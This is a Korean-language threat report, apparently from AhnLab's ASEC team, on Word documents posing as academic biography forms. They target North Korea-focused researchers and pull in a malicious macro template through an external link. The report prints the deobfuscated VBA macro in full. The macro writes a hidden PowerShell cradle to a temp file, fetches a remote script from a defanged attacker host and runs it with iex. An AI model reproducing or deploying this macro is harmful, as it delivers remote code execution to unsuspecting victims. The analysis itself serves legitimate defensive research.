ASEC 분석팀은 지난달부터 꾸준히 워드 문서를 이용한 APT 공격에 대해 게시하였다. 최근 해당 유형의 악성코드가 ‘BIO 양식’ 제목으로 꾸준히 유포되고 있음을 확인하였다. 이전 워드문서의 유포 이력을 보면 해당 파일 역시 대북관련 교수나 연구소장을 타겟으로하여 학술전기(Biography) 양식을 가장하여 유포 중인 것으로 추정된다.
최근 유포가 확인된 파일 역시 워드 파일 내부의 External 링크를 통해 악성 매크로가 포함된 dotm 파일을 실행한다. 아래는 8월 2일에 유포가 확인된 ‘BIO 양식(XX 소장님).docx’ 파일에 포함된 External 링크이다.

다운로드 된 BIO.dotm 파일에는 악성 매크로가 포함되어 있다. 매크로 코드는 전과 동일한 방식으로 난독화 되어 있으며, 난독화를 제거하면 아래와 같은 코드를 확인할 수 있다.
Private Sub Document_Open()
Set djfeihfidkasljf = CreateObject("Shell.Application")
dfgdfjiejfjdshaj = "powershell.exe"
dfjsdjailfksf = "C:\windows\temp\Ahnlab.log"
skdjfksjkfjkdsfj = "$fjeils={(New-Object Net.WebClient).Dring('hxxp://zenma.getenjoyment.net/ja/ng.txt')};[string]$aiwdf=$fjeils;$ndask=$aiwdf.insert(28,'ownloadst');$bmcns=iex $ndask;iex $bmcns"
Open Trim(dfjsdjailfksf) For Output As #2
Print #2, skdjfksjkfjkdsfj
Close #2
dfisafkdjaflkjs = "$a='C:\windows\temp\ahnlab.log';$d=[IO.File]::ReadAllText($a);$e=iex $d;iex $e"
djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, dfisafkdjaflkjs, "", "open", 0
Dim SngSec As Single
SngSec = Timer + 5
Do While Timer < SngSec
DoEvents
Loop
Kill (dfjsdjailfksf)
End Sub
기존에는 특정 URL로 직접 다운로드를 시도하는 파워쉘 명령어를 수행하였지만, 해당 매크로 코드는 다운로드 명령어를 ‘Ahnlab.log’ 파일에 작성한 후 생성한 파일을 실행시키는 방식으로 변화하였다.

워드 파일 실행 시 수행되는 파워쉘 명령어는 아래와 같이 변화되었다.

최종적으로 실행되는 hxxp://zenma.getenjoyment.net/ja/ng.txt 에 존재하는 스크립트는 전과 동일한 기능을 수행한다.

특정 사용자를 타겟으로 External 링크를 활용한 워드 문서가 여전히 유포되고 있어 사용자의 각별한 주의가 필요하다.
V3에서는 위에서 소개한 유형의 파일들에 대해 다음과 같이 진단하고 있다.
[파일 진단]
- Downloader/XML.External
- Downloader/DOC.Agent
[관련 게시글]

연관 IOC 및 관련 상세 분석 정보는 안랩의 차세대 위협 인텔리전스 플랫폼 ‘AhnLab TIP’ 구독 서비스를 통해 확인 가능하다.
Categories:악성코드 정보